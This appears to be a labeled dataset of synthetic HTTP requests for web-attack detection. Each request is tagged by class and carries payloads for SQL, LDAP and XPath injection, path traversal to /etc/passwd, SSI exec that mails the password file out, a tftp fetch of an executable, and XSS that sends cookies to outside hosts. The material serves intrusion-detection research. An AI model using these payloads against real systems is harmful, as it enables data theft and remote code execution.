Date: Wed, 07 Apr 04 11:10:21 UTC
ETag: "yl.C9suIrkwr8sljNEE"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Sun, 27 Sep 09 16:18:48 GMT
If-Unmodified-Since: Tue, 07 Oct 08 10:52:11 CET
If-Match: "pbhG5xQqs5Qa@5fNn8"
If-None-Match: "iIRmCLKqu4.t8i5"
If-Range: *
Max-Forwards: 8
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: Digest opaque="Onooem"
Range: 306-7480,026547-8
Referer: /e2ttqe/eaehtd/Hfhu.gif
TE: trailers
Trailer: Referer
User-Agent: Mozilla/1.1 (X11; U; Solaris 0.2; gk-yu; rv:1.2.8) Gecko/60879699
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: FTP/8.4 116.93.217.116
Transfer-Encoding: identity
Upgrade: 2srsc/7.4
Warning: 609 184.74.244.63 "4eeduvihasrtaelteL3" 
X-Forwarded-For: 15.44.55.26
X-Serial-Number: 4915309492060646563
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37264
Start - Id: 35236
class: SqlInjection
GET /16imlht6Yee/kNdr.jpeg?sf=t+zi%40&D25IUjf=5&s4oltN9sype=7860645&tqibDbiS2pu=2WekBxoBQ&lehgeol=p&nstgo0=7369&leo6rEer5rx=7547592&ii2eq1ee3xgiji=8425&cT1lltAi8cgt4=%27+%29++UNION++ALL+SELECT++++%27o3dha%27%2C4962%2C4775%2C%27wapntx6e%27%2C05+++++FROM+++++sy+++++WHERE++++%28%27%27++%3D+%27&teEhac8n=oCiqdsuqb&GKAtl=ls&o7telnet.28=iew HTTP/1.0
Host: www.qoaa8i.uk
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: a=aed9stV
Client-ip: 61.19.198.20
Cookie: ID8Oe2where=eta :rk;W0deq_0-tj=o569;5todrwo0esix=rn9SY-BgIG
Cookie2: $Version="55"
Date: Mon, 14 May 07 20:58:38 GMT
ETag: "rHuQDmKzfY2ZnTLVvsn7"
Expect: 100-continue
From: niuRy@wlrqea.com
If-Modified-Since: Sat, 15 Mar 08 03:54:00 GMT
If-Unmodified-Since: Sat, 14 Nov 09 10:32:54 GMT
If-Match: *
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 301
MIME-Version: 1.1
Pragma: eun=igjada
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Basic eHJjZXJlQ0U6b2VoTm9w
Range: -5631,75-
Referer: /eCtj1tuo/chrlbzt/Bbpo8P/cbsTuw1o.jpg
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/5.0 (Machintosh; U; PPC 1.9; 0l-sn; rv:7.3.4) Gecko/09745297
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 0.5 www.aiom.js, peI/9.7 www.eleett.jpeg:7, FTP/1.7 5.145.27.180:51704
Transfer-Encoding: i7ohtu
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35236
Start - Id: 43418
class: OsCommanding
GET /s5zojrdH8otx/ooLkirj5er/ZSs/pqN-XsFaYO/Hnull8vsl/b-vyEOwFFHnTqhC/x875jCPtTHhwh/eOT/eaaeHadt2P2aun.jpeg?inFcoinputAZ2og=03569858&RIs3WDBK5=sfcgkiiMassa&iaeaeaeoMse=rp2ZAbQ2v&jyJrcpWF0Y@Dv=nes%3Dxiq&ndocumentlocationY.STLM@=tftp+++-c++get++++55.198.165.149%3A%2Fiegeorer%2Fmeilol.exe++++%7C&gWol5n4o=31097912&iuo0do0uRpr=%3Cm%3Fte&ttjd=658136 HTTP/1.1
Host: www.4ttn9.org:80
Connection: rllubhr
Accept: application/*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.5, compress;q=0.7, compress, compress
Accept-Language: s53t3e-9iv;q=0.9, ome-cWtvdndu;q=0.4, s-sao;q=0.6
Cache-Control: max-stale
Client-ip: 90.153.176.45
Cookie: a6areot=rr4tm
Cookie2: $Version="4"
Date: Wed, 03 Jun 09 22:33:58 UTC
ETag: "mEPozZ71GcoRFyRYFtLN"
Expect: oteD40
From: eM8p@ehnasbf.it
If-Modified-Since: Sun, 13 Jun 04 09:04:32 GMT
If-Unmodified-Since: Tue, 08 Jan 08 21:33:18 GMT
If-Match: *
If-None-Match: "I.NPbsSwtf-G1ILT1ER"
If-Range: Mon, 27 Mar 06 03:50:17 GMT
Max-Forwards: 7739
MIME-Version: 5.1
Pragma: tzh='y'
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: -99
Referer: /nuttxsws/tihna/dEiun/eleoSa.ace
TE: chunked;q=0.2
Trailer: Warning
User-Agent: aehffe6
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 839 9.250.244.208 "zcim2oejoecon8f" 
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43418
Start - Id: 46418
class: PathTransversal
GET /bf9IV/e55LyQZSUaK/yzenia2inuglh/shQsNn387R8W/aEDM.YTjY.php?symgijesrw=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&al3hohl=b2p&P_Qre6z0dxf=7&7eE=sEnereta2&tkitalx7h=aoOenrapoea0o3s&Yhl9gsE=3&qlTgd4=7tde3ne2ron HTTP/1.1
Host: www.ih5aNe8t.it
Connection: close
Accept: video/*;q=0.6, text/xml;q=0.7, image/jpeg
Accept-Charset: windows-1254;q=0.2, x-mac-roman, x-mac-turkish, cp-950;q=0.1
Accept-Encoding: 
Accept-Language: 4-buc;q=0.2, bo-w, RHuOsr-sn;q=0.5, f8a97-ezwt, 4-hei;q=0.0
Cache-Control: min-fresh=7425
Client-ip: 81.141.227.75
Cookie: nudaDssseaRindr=aamtna<'f
Cookie2: $Version="1"
Date: Tue, 10 May 05 07:40:20 UTC
ETag: "7F80YTH_JJbucQ6@88o"
Expect: uPorng
If-Unmodified-Since: Wed, 21 Apr 04 06:25:15 CET
If-Match: "cswTilLOxwbu5e5"
If-None-Match: *
If-Range: Wed, 06 Jul 05 20:57:03 GMT
Max-Forwards: 768
MIME-Version: 1.3
Pragma: emse5ea=t
Proxy-Authorization: Basic Yko1MG9kOmVpaG5w
Authorization: l2Xanh 5tpe=n7aj
Referer: http://www.ttqnsx.fr/hitrlQd/pcEbaj/adwOr/nhel5f.php
TE: gzip;q=0.5,deflate,trailers
Trailer: Trailer
User-Agent: haUf/7.8.5
UA-CPU: x86
Via: 9.5 44.94.164.201, 4.9 www.pesneY.gif
Transfer-Encoding: identity
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 543 208.43.170.15 "hd5o7soouee3cviemc" 
X-Forwarded-For: 80.80.233.157
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46418
Start - Id: 39999
class: SSI
GET /otWxnAr795-hzBDOp/tozJVYQ/oenfoo5Do1beeaiet/nnbcltpteose/stdinPs1h@cre/oNZBbx4q9/Ge/ld7eetlIoEanneeSso/7cx/asry/2orq-b/q9n7WKsH-D5cNUhTN6.css?nr=130715&Iu_XNWtmp_ndoptd=accept+&5aoua9cdn=tnpi9iseim&Rzd3hjkfLW-D=hcwvarechot%2Bhtaccesn+nrsl&dtseo0lstdgw5Tb=%3C%21--++%23exec++++cmd%3D%22%2Fbin%2Fmail+++++eiebf.com+%3C++++%2Fetc%2Fpasswd%22--%3E&eti1an=adstHterw&tciili3ahe1ai=705&OTnhr4yo7t5n3=7392686748&oyuddcelhehd=525322871&UNX6F=%5D%28d&toeuemAd1bftTf=ouerent-io&IjdVPu7=yuceqi HTTP/1.1
Host: 142.124.251.208
Connection: close
Accept: text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=38678
Client-ip: 253.235.28.77
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="26"
Date: Sat, 05 Jun 04 07:45:45 GMT
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: i6odg8a
From: atetgwlh@rphs.com
If-Modified-Since: Thu, 18 Feb 10 08:40:15 CET
If-Unmodified-Since: Thu, 08 Apr 10 22:18:27 UTC
If-Match: "JqJ7.a5rHK9o0un.us0q"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Sat, 10 Nov 07 15:50:00 CET
Max-Forwards: 4214
MIME-Version: 5.0
Pragma: l=e0oifetL
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest qop=auth-int
Range: 33658-,347-
Referer: /8sts/qehael.jpg
TE: deflate;q=0.0
Trailer: TE
User-Agent: Mozilla/1.4 (Windows; U; WinNT 9.9; in-ee; rv:6.0.6) Gecko/57306486
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: HTTP/0.9 203.144.139.224
Transfer-Encoding: noosa
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39999
Start - Id: 39166
class: SSI
GET /hnnNc/emeaaldoiHy3rHt1ahTo/Hexechtpassyek.SlVPzhttps/1node90i0@PKupdateA/HrHiyA0ilenz/ugdruUv4_7_KZ1WWB/5lJw/hos8a/6hneinclude/sgeimaes2NeDasme.png?bpA=rdYfan&yX3ysor=acnc+s&pro1ggiasj7tHnd=nr_wKaR43W&nh=soiiwr&hw4eso=eFtCmT.kNL2&hneynmcaegyaeo=8X HTTP/1.1
Host: 39.45.148.211:8170
Connection: sayTn
Accept: audio/basic;q=0.0, text/*, application/x-tar
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 215.6.239.92
Cookie: skIgoosintp=9;ieohqri=<!--  #exec    cgi="/cgi-bin/script?uoaeda"   -->;eahshifywln=I6aautoexec;0i8moyrh9;iteeot=6d1TP;ial=eoFuAsh6a8tiesty
Cookie2: $Version="47"
Date: Sun, 31 May 09 16:09:31 CET
If-Unmodified-Since: Sun, 07 Oct 07 15:23:18 UTC
If-Match: "0iWReAA9xsBuHXA"
If-None-Match: "GhJNk7Z@PQk8ZuR5R"
If-Range: Wed, 20 Jul 05 24:12:12 GMT
Max-Forwards: 9359
MIME-Version: 7.7
Pragma: no-cache
Referer: /sontt8th/Dwierau/iflG/sdhti.bin
Trailer: Cache-Control
User-Agent: Mozilla/0.5 (compatible; eqa6any; WinNT; Eihee1tnlo; eoewifvebs)
UA-OS: WinNT
Transfer-Encoding: compress
Warning: 902 112.253.243.6 "SEczima" "Sat, 02 Feb 08 18:53:38 CET"
X-Forwarded-For: 226.98.208.68

null

End - Id: 39166
Start - Id: 44792
class: PathTransversal
GET /Oto/0GpbwXwgw9g5EXZTA/7tdHgmYy_G5kkC6XOC/sTR/iPB7Y63ONO1O./ntBotcoayyt8eel/@SXCJNEUccatlink9d/hWjxPomHgx/ic@4z.css?veikehatsode=56285046&iacceptSSnTW=collection%28+file%3A%2F%2F%2Fc%3A%2Foretj%2FyHd9st.xml++++%29&jAON1A=6robAfFtcea09b1oaj&R1HQ15=49651&Lgoe=bgsound2a&iahtcFnraate=n921i_tQL&teitnegwaeeEYys=xi3 HTTP/1.1
Host: www.jA4jNn0a.org
Connection: gctA6m6
Accept: */*
Accept-Charset: iso-8859-9, iso-8859-8-i;q=0.0, windows-1257
Accept-Encoding: 
Accept-Language: 1lionnu3-sam5;q=0.9, w0-sitlbnse, hOuru-sEgpwel5;q=0.1, so-eaeXatee;q=0.5
Cache-Control: max-age=0257
Client-ip: 23.244.49.112
Cookie: utatoui=  iineIe5betweenfromp0nynRdor(;pamr=1tnfh;_8U9jLP=284855;gitsouI=wfnraetuyaoKhe;fieomesrsgh=elsformnahAnedaer\;5ai5ZdIGlJFM=petB7pcnkmCH
Cookie2: $Version="0"
Date: Thu, 01 Nov 07 20:59:09 CET
ETag: W/"DVV@pj03ApxUb9eIG"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Mon, 27 Mar 06 13:37:41 GMT
If-Unmodified-Since: Sun, 11 Apr 10 09:42:25 CET
If-Match: "3nI8a8sNuuQe3il9P"
If-None-Match: *
If-Range: Fri, 01 Jun 07 16:07:58 CET
Max-Forwards: 3
MIME-Version: 7.4
Pragma: ow6lg='nt'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://www.LIst.org/Raue/prueq9y.cfm
Range: 99-
Referer: http://qtdimi.fr/nurpcwy/0eg1f/ehrcennn/lo09.pdf
TE: trailers,deflate,chunked;q=0.2
Trailer: Expect
User-Agent: Mozilla/2.0 (compatible; Konqueror/6.9; WinNT; tEcp; ihaNoga; tiztsxa)
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5717x165
Via: 7.4 www.bcgs.tiff, 2.6 www.YodeE4.shtml, 9.6 25.113.223.183:1
Transfer-Encoding: gzip
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 4.75.179.74
X-Serial-Number: 2157159271334
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44792
Start - Id: 48157
class: XSS
GET /u33/tFtQJXrZ-_@U..jpg?ogalX=%3Cobject+++classid%3D+%22++++clsid%3A...%22++++codebase++++%3D++++%22javascript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.isnd.com%2Fcgi-bin%2Fvela.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E HTTP/1.0
Host: 18.38.188.115:83947
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1255;q=0.9, x-mac-turkish
Accept-Encoding: *
Accept-Language: O4asae-eudg;q=0.7
Cache-Control: no-store
Client-ip: 211.190.214.99
Cookie: gsMCeEi=whQ;huqlts7srHavcn=w1G;Laccess_logK-x4=btt;uu;ng;gty8YdOvjAnF=nnhivq5;9gDLBHacceptBP=/hhl6zofjo0EcsD
Cookie2: $Version="101"
Date: Sat, 24 Jul 04 07:38:14 UTC
ETag: "pUzROrgjSs9Xmvu4TxL"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Sat, 13 May 06 06:12:11 GMT
If-Unmodified-Since: Mon, 04 Apr 05 15:57:01 UTC
If-Match: *
If-None-Match: "_pkVe33oqAxB8UYK"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.3
Pragma: lCbhoBeh=asresse
Authorization: Digest algorithm=MD5-sess
Range: 248-
Referer: /ot23on/tyetw/hAiiha/5anOwmy/dNsoneLa.swf
TE: trailers,gzip;q=0.3,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: rzzWN0 http://www.praOf.it
UA-CPU: MIPS
UA-Disp: 187,5451,16
UA-OS: Windows NT
UA-Color: color8
Via: 7.0 www.iirO.html, awn/6.9 206.252.251.248
Transfer-Encoding: identity
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48157
Start - Id: 46566
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: 49.125.11.31:80
Connection: ecm7
Accept: text/xml;q=0.3, image/*;q=0.9, video/*
Accept-Encoding: gzip;q=0.8
Expect: 100-continue
If-Match: "zAYY1Evwl-b.0JRy"
Max-Forwards: 331
Pragma: oaowmAn='k'
Authorization: Digest algorithm=2vbuu
Referer: http://grtg.net/72or6.php
TE: gzip;q=0.3,trailers
User-Agent: lrEniTi4 (ldrrKPf; ssrGg6x; r44AlWXT)
Via: 7.2 249.71.194.184, 5.5 71.147.189.28, 0.7 23.75.146.168

null

End - Id: 46566
Start - Id: 37527
class: LdapInjection
PUT /t-Q/raqqxqh/alVW.rX58/3tiedayodS83or/tacewNan/e3sjeodssapca7rana/Ns/tcsn/jyRuZdmvb2wAVDi.asp? HTTP/1.1
Content-Length: 144
Content-Language: ai,s
Content-Encoding: deflate
Content-Location: http://yaatmOt.it/afte/rygs7tR/Phnceya/ooeocph.jsp
Content-MD5: ekk2cHNFYW90Mzc3M0RzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Nov 08 20:58:54 CET
Last-Modified: Thu, 14 Jun 07 14:20:43 GMT
Host: 181.228.196.251
Connection: nrhsaoe
Accept: image/gif;q=0.1, video/quicktime
Accept-Charset: ks_c_5601-1987;q=0.1, koi8-r;q=0.7, isiri-3342;q=0.1
Accept-Encoding: 
Accept-Language: da8tsl-pl7iRheh;q=0.7, eh-twehsE;q=0.7, EE3oefn-teadsdu, aoat00h-hiy;q=0.2
Cache-Control: max-age=82
Client-ip: 106.155.251.0
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Wed, 08 Feb 06 12:22:38 CET
ETag: "eRBcLEPpUSsRmtpuW-pP"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 17 Jan 08 11:22:36 CET
If-Unmodified-Since: Sun, 03 Aug 08 11:02:24 GMT
If-Match: *
If-None-Match: "MDJUNpwO41Fggpt"
If-Range: Sun, 30 Mar 08 06:28:04 GMT
Max-Forwards: 2188
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: 0asc eGcueeu=UjMt4nt
Range: 0516-7855,069180-,334-
Referer: http://www.zztTFjs.it/kotrms/0sbIerh/9qna.mpeg
TE: trailers
Trailer: Expect
User-Agent: abtr7i (dgi.yo; 2toe8TDr; mNFDxnl; gkHf_m)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: FTP/0.4 151.217.248.46
Transfer-Encoding: identity
Upgrade: 6ciYs/4.5, tUt/0.1, hmo/8.6, HPozai/2.7, 4rIvIy/9.5
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

formClWHg=dqi(weoT%te \&eoroehllteerf=laEe)(| (eeei=*)&39ahboyiteore=tojz7r&tsmgxztpdme=7e&erliruavd=ovupdate&ezsyI9QUx4=iSz_S

End - Id: 37527
Start - Id: 40813
class: SSI
GET /a@sbq1CYNx88Fhi/yh/qsn6InHsLsae/7lebLTd0wDR/wK@dTei.zuoCKqepq/cRq/d.5c60B7wacq.asp?ndwrtiT2e8nst=65534&ee4m=h%3B&hdsms43iis=y4drH0n0&1ODKp=377174014&pjsntlaw7id=nN2y&ofho0e=gTlfo6stt&mten=%3C%21--++%23odbc+++statement+++%3D++%22select++nsbe%2C++0yr%2C++egsn+++++from++++hptsMTeti0++++order+++by+++0%2C+++378%2C+2%22+++--%3E HTTP/1.0
Host: 93.214.189.77
Connection: tEIm
Accept: */*
Accept-Charset: iso-8859-3
Accept-Encoding: *
Accept-Language: tocmo3-ssHH;q=0.2, e-tindnd;q=0.2, 4rh-aitsjf;q=0.9
Cache-Control: max-age=60391
Client-ip: 89.161.138.91
Cookie: bxsE0qowo4q=lbdmheooaoe;novn=596;9uphrtcngtaaka=oLajeeowereplaceb0
Cookie2: $Version="84"
Date: Tue, 15 Feb 05 20:10:17 CET
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: zy1Nra
From: iiljwdi@httr81j.de
If-Modified-Since: Wed, 18 Jan 06 11:58:44 GMT
If-Unmodified-Since: Sun, 25 Feb 07 24:47:14 CET
If-Match: ".ghuRfE_DK4TffeKu4-n"
If-None-Match: *
If-Range: "Jz@uU_i@G5wY0Wp"
Max-Forwards: 2
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="9des"
Authorization: NTLM bW9haTl0Y2d0eWl1aHphRWMwYnlyRWFsYWdhSGFpbWZobWFv
Range: -4,-190,-803524
Referer: http://www.Jat3.be/KhulMm/hbeeztoh/tsa1nrw/teda.dll
TE: gzip,trailers,chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/1.9 (X11; U; Open BSD i386 7.5; 9k-2a; rv:5.5.0) Gecko/30689319
UA-CPU: StrongARM
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 871x928
Via: 95e/1.5 www.Jd6get.css, 8.5 212.191.99.114
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: osd5g/7.7, cplms/1.4, dtwnv0/2.5, h9zg/0.0
Warning: 702 31.235.172.183 "f1taware" "Sat, 10 Jun 06 18:57:03 GMT"
X-Serial-Number: 17196143235816087076
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40813
Start - Id: 48200
class: XSS
POST /dtottt0li4Dgltoetas.js? HTTP/1.1
Content-Length: 279
Content-Language: rNra,4teseUo,urroiNf
Content-Encoding: deflate
Content-Location: /n3rayw/cailca/ihaSjrn/olyardng.css
Content-MD5: ZXRxZ2FlZWluc05yYmhpOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Jan 05 06:32:48 CET
Last-Modified: Thu, 10 Aug 06 19:02:21 GMT
Host: 150.226.15.211:80
Connection: close
Accept: image/gif
Accept-Charset: iso-8859-5;q=0.9, euc-tw, us-ascii;q=0.6
Accept-Encoding: identity, gzip;q=0.2, gzip, gzip;q=0.2, gzip
Accept-Language: <img src=   "   javascript: [document.location.replace    ('http://www.la.com/cgi-bin/it.cgi'+document.cookie);] "   >
Cache-Control: no-cache
Client-ip: 198.54.180.201
Cookie: Iherati=1999;nvheamcmtuceo=s2wtUv4;KwgetX2CSN=538082;XincludeTCbq=42688;ni53el=telnetxe1dreplacee9rosystemEt
Cookie2: $Version="058"
Date: Sat, 23 Oct 04 16:16:29 GMT
ETag: "0CAyPur0HCysTNWfdo"
Expect: klhu=tyrxAQ
From: nio6@slo8Cr.fr
If-Modified-Since: Sat, 08 Jan 05 02:47:38 CET
If-Unmodified-Since: Fri, 08 Jul 05 11:53:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.8
Pragma: x6=roonY
Proxy-Authorization: Digest username="moie1"
Authorization: Basic b2RiaG90OjZvbDk=
Range: 86-
Referer: /cterfed.nsf
TE: deflate;q=0.4,deflate;q=0.5
Trailer: If-Range
User-Agent: u--TX8c http://www.inhgfai.fr
UA-Disp: 9694,0941,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0833x5233
Via: FTP/0.6 www.mm08eas.css, 5.8 0.165.6.247
Transfer-Encoding: compress
Upgrade: nw3/1.2, Eccue/9.3, dnaeM/4.7, yeug/4.3
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wcuNadyscpkh4a=heeesnsa0na&meov0lt3biihdtw=bMoThInito28rsV&_pnp1QebodycatZoin=|&apzrlre=aI0h&ef2knitaeNkez=uV6BJeKv5lg&ewtbtA6virsem=a\oor nedZre5/Ut0&tstdintBEvH_like1servicesi=64817&Scautoexech7Q1=fm(&5sp0Rtsehtieets=43&sarbpHsfQU9emsd=10859&hhr8t1s=0hsgrwgetm&md=Uth3e

End - Id: 48200
Start - Id: 48011
class: XSS
GET /OYPJqCmINf.swf?arh4lsi=ei4aurn%29oimg%3EbaeHr%5Cl&f.Kr=%3Cimg+src++%3D%22+++++nd++++%3E%22++onmouseover++++%3D+++%22++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.remesi.com%2Fcgi-bin%2Fisieol.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E&uehtt=8859145&apcottranRcnFtt=47555311 HTTP/1.0
Host: 165.95.115.184
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.4, gzip;q=0.9, identity;q=0.7, gzip
Accept-Language: bdy-emw
Cache-Control: max-age=2146
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="40"
Date: Fri, 09 Mar 07 23:37:47 UTC
ETag: "wpRitPdByMlsrTEbXjXz"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 19 Sep 08 05:30:21 UTC
If-Unmodified-Since: Sat, 29 Sep 07 21:16:05 GMT
If-Match: "zjXxMrbyh_n85Wan7"
If-None-Match: *
If-Range: "GfDk.aHG6n7hj0ZvNwLj"
Max-Forwards: 017
MIME-Version: 8.3
Pragma: 2ne0='sltYoe'
Proxy-Authorization: NTLM NnJhc2lkbGhldzBvZWFkcDRlYW5zdWVuaWF0c0xuaGdnZXBob28=
Authorization: NTLM eTZwZGVlM1M3TTdpYm5pYWV0b3R1cmR0Q2VvaXJhcXNscnRBTmg=
Range: 545-32,248-,104203-4203
Referer: /nNtgSrl/niscsjge.jpg
TE: trailers,deflate;q=0.2,trailers
Trailer: User-Agent
User-Agent: sf8rixmi/1.3.1.3.5
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9754x5278
Via: 4.4 237.166.106.7, 0.2 173.67.101.75, 5.2 www.tde0d.htm
Transfer-Encoding: ities
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48011
Start - Id: 49686
class: XPathInjection
GET /mPGWO_VadminT62/tSXc-WK4gcYC/Vcqbz-/2LRopt8form0V.VW%uP/c@@r/uPcJ1fvBJ/mrR.cfm?eceraAee=S4EPqhes&62vK@-8=6361+++or+++++misEno%2Fo%2F5sn%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D++or+++++24%3D&aetZu=311969828&ekgEhrioiUao=9&yAnar=9&tthlito=068790655&RxGPRRMu8=neyOwd&ltnDxub=ect&lqrochmn=iU4z7 HTTP/1.1
Host: www.C18eejRw.st
Connection: spon4he
Accept: video/mpeg, video/mpeg, video/*;q=0.4
Accept-Charset: x-mac-turkish, windows-1251, euc-kr
Accept-Encoding: 
Accept-Language: utceas-asleihn;q=0.3, lrroq-6atfmec;q=0.6, tsm6rdoc-t;q=0.2, ds7Wbiwe-edisrhx;q=0.3, rdrcme-snjrti;q=0.7
Cache-Control: max-stale=1020
Client-ip: 223.106.137.113
Cookie: ettcnYo=dSJgph;rf=00;yoetci8ct4=mrYL8CYoYtH-;hphseh4AgeE=0509
Cookie2: $Version="176"
Date: Mon, 01 Jun 09 03:59:12 GMT
ETag: "kEZV4g66j0qldaMaD"
Expect: Aahhoh
From: earb@naiA.org
If-Modified-Since: Tue, 24 Jul 07 12:56:21 UTC
If-Unmodified-Since: Wed, 22 Nov 06 16:25:00 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 78
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: Basic amFucm86YWVOdW9l
Range: -394122
Referer: /styewn/sIss.tiff
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/2.0 (compatible; Konqueror/8.4; Open BSD i586; tsftthx; aTnHTkfn)
UA-CPU: StrongARM
UA-Disp: 764,428,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: 7.8 223.69.76.204
Transfer-Encoding: gzip
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49686
Start - Id: 41494
class: SqlInjection
